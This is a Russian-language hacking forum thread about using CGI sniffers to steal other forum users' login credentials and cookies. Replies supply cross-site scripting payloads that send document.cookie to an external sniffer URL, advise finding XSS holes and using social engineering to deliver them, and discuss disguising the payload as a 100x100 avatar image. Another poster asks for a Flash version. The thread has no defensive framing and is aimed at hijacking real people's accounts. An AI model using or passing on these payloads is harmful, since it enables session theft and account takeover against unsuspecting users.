Как использовать cgi-снифферы?
 

Привет всем, кто здесь присутствует.

Прошу совет, что делать дельше...
Я поставил сниффер с http://www.s.netsec.ru/ на один форум....кто-то нажал на мою фотку и у меня повились строки с IP адресом, ссылкой из какого топа пришли и время....а что надо дальше сделать, чтобы узнать логин и пароль этого счастливчика???
или cookie....

жду ответа, заранее благодарен.
____________________________

А для этого нужен какой-нибудь скрипт, который ворует куки или тег )))

например если сниффер JPG, то <script>var img=new IMG(); img.src="sniffer/s.jpg"+document.cookie;</script> Или ченит типа этого ))

найди xss уязвимость если пассивная то можно с помощью СИ(фреймы,или прямую ссылку это зависит от твоего воображения и опыта в СИ) если активная,то там на порядок проще.
Код который нужно вставлять тебе уже привели,другие примеры скрипта ворующего куки можно поглядеть на antichat.ru

Давайте из темы не будем делать флейм,все что не по теме (а у нас она про cgi снифферы) щас сотру.

Прошу прощения, напишите мне плиз скрипт, чтобы его можно было во Flash вставить...
ну короче говоря...есть Flash сайт....мне надо сделать так, чтобы при кликанье ссылки на мой сниф приходили куки...вот и всё....в ссылку могу вписать Java Script, FS Command, Action Script ну или ссылку на страницу....прошу напишите для чего-нить из этого скрипт....

мой снифф http://s.netsec.ru/ZetRoX/pic.gif

обычно юзается скрипт <script>img=new Image(); img.src="http://s.netsec.ru/ZetRoX/pic.gif?;"+document.cookie;</script>

у меня встречный вопрос:
Как указать в скрипте размер картинки? (чтоб форум не противился принятию как аватар) требуется размер 100*100

я знаю, что этот скрипт, но он нефига не работает даже на самом себе проверял....

он работает но чтоб он работал на всяких форумах/порталах надо каким то образом сделать чтоб аплоадеры распоновали как ЖэПэГэшку с размерами 100*100